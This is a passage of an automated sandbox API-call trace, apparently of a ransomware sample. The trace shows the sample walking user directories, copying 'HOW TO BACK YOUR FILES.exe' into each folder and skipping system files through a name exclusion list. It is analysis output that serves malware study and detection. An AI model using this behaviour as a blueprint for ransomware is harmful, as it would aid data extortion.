(lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.535] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.535] GetLastError () returned 0x0 [0060.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.535] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.535] CloseHandle (hObject=0x12c) returned 1 [0060.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.535] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.536] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.536] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.536] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.536] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.536] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="aoldtz.exe") returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="windows") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="bootmgr") returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="temp") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="pagefile.sys") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="boot") returned 1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="ids.txt") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="ntuser.dat") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="perflogs") returned -1 [0060.536] lstrcmpiW (lpString1="Credentials", lpString2="MSBuild") returned -1 [0060.536] lstrlenW (lpString="Credentials") returned 11 [0060.536] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\*") returned 48 [0060.536] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0060.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0060.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1708 [0060.536] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0060.536] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0060.536] lstrcmpiW (lpString1="Feeds", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.536] lstrcmpiW (lpString1="Feeds", lpString2="aoldtz.exe") returned 1 [0060.536] lstrcmpiW (lpString1="Feeds", lpString2=".") returned 1 [0060.536] lstrcmpiW (lpString1="Feeds", lpString2="..") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="windows") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="bootmgr") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="temp") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="pagefile.sys") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="boot") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="ids.txt") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="ntuser.dat") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="perflogs") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds", lpString2="MSBuild") returned -1 [0060.537] lstrlenW (lpString="Feeds") returned 5 [0060.537] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned 58 [0060.537] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Feeds" | out: lpString1="Feeds") returned="Feeds" [0060.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0060.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2d30d0 [0060.537] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0060.537] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="aoldtz.exe") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2=".") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="..") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="windows") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="bootmgr") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="temp") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="pagefile.sys") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="boot") returned 1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="ids.txt") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="ntuser.dat") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="perflogs") returned -1 [0060.537] lstrcmpiW (lpString1="Feeds Cache", lpString2="MSBuild") returned -1 [0060.537] lstrlenW (lpString="Feeds Cache") returned 11 [0060.537] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned 52 [0060.537] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Feeds Cache" | out: lpString1="Feeds Cache") returned="Feeds Cache" [0060.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0060.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1788 [0060.538] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0060.538] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a6392c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.538] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.538] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="aoldtz.exe") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="bootmgr") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="temp") returned -1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="pagefile.sys") returned -1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="ids.txt") returned 1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="ntuser.dat") returned -1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="perflogs") returned -1 [0060.538] lstrcmpiW (lpString1="Internet Explorer", lpString2="MSBuild") returned -1 [0060.538] lstrlenW (lpString="Internet Explorer") returned 17 [0060.538] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned 58 [0060.538] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Internet Explorer" | out: lpString1="Internet Explorer") returned="Internet Explorer" [0060.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0060.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e9eb0 [0060.538] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0060.538] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="aoldtz.exe") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2=".") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="..") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="windows") returned -1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="bootmgr") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="temp") returned -1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="pagefile.sys") returned -1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="boot") returned 1 [0060.538] lstrcmpiW (lpString1="Media Player", lpString2="ids.txt") returned 1 [0060.539] lstrcmpiW (lpString1="Media Player", lpString2="ntuser.dat") returned -1 [0060.539] lstrcmpiW (lpString1="Media Player", lpString2="perflogs") returned -1 [0060.539] lstrcmpiW (lpString1="Media Player", lpString2="MSBuild") returned -1 [0060.539] lstrlenW (lpString="Media Player") returned 12 [0060.539] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned 64 [0060.539] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Media Player" | out: lpString1="Media Player") returned="Media Player" [0060.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0060.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1808 [0060.539] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0060.539] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66d8860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4d1d5e4e, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0060.539] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.539] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0060.539] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0060.539] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0060.539] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0060.539] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="aoldtz.exe") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2=".") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="..") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="windows") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="bootmgr") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="temp") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="pagefile.sys") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="boot") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="ids.txt") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="ntuser.dat") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="perflogs") returned 1 [0060.539] lstrcmpiW (lpString1="Windows Mail", lpString2="MSBuild") returned 1 [0060.539] lstrlenW (lpString="Windows Mail") returned 12 [0060.539] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned 59 [0060.539] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Windows Mail" | out: lpString1="Windows Mail") returned="Windows Mail" [0060.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0060.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1888 [0060.539] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d2268 [0060.539] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="aoldtz.exe") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2=".") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="..") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="windows") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="bootmgr") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="temp") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="pagefile.sys") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="boot") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="ids.txt") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="ntuser.dat") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="perflogs") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Media", lpString2="MSBuild") returned 1 [0060.540] lstrlenW (lpString="Windows Media") returned 13 [0060.540] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned 59 [0060.540] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Windows Media" | out: lpString1="Windows Media") returned="Windows Media" [0060.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0060.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f0518 [0060.540] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2288 [0060.540] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="aoldtz.exe") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="windows") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="bootmgr") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="temp") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="pagefile.sys") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="boot") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="ids.txt") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="ntuser.dat") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="perflogs") returned 1 [0060.540] lstrcmpiW (lpString1="Windows Sidebar", lpString2="MSBuild") returned 1 [0060.540] lstrlenW (lpString="Windows Sidebar") returned 15 [0060.540] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Media") returned 60 [0060.540] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Windows Sidebar" | out: lpString1="Windows Sidebar") returned="Windows Sidebar" [0060.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0060.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2effc8 [0060.541] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0060.541] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0060.541] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.541] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0060.541] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0060.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0060.541] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0060.541] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned 62 [0060.541] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar" [0060.541] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.541] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.541] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.541] GetLastError () returned 0x0 [0060.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.542] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.542] CloseHandle (hObject=0x12c) returned 1 [0060.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.542] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.542] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.542] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.542] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.542] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 